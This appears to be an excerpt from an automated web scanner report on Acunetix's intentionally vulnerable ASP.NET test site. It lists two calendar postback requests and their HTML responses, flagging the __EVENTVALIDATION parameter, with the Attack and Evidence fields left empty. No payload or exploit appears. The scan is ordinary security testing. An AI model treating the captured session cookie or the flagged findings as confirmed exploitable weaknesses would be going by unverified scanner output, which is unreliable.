Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8138&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAlY3gHNoIZGRk14hIUikazls4%2BLBMvzH31lChVaE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKYk%2F%2FGBAKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJD5CUpV5K4fad%2BRRSXgmqGO%2B56M
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:23 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAlY3gHNoIZGRk14hIUikazls4+LBMvzH31lChVaE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKYk//GBAKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJD5CUpV5K4fad+RRSXgmqGO+56M" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:White" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8371&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDVJ%2FjT2ghkZGQKZvm%2BHAg1iXmykDnvv0L%2FmbwQJg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKYkb7GAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJGa8nCz%2FyGg31MzNr0O4EcjpZQ2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:59 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDVJ/jT2ghkZGQKZvm+HAg1iXmykDnvv0L/mbwQJg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKYkb7GAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJGa8nCz/yGg31MzNr0O4EcjpZQ2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:White" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
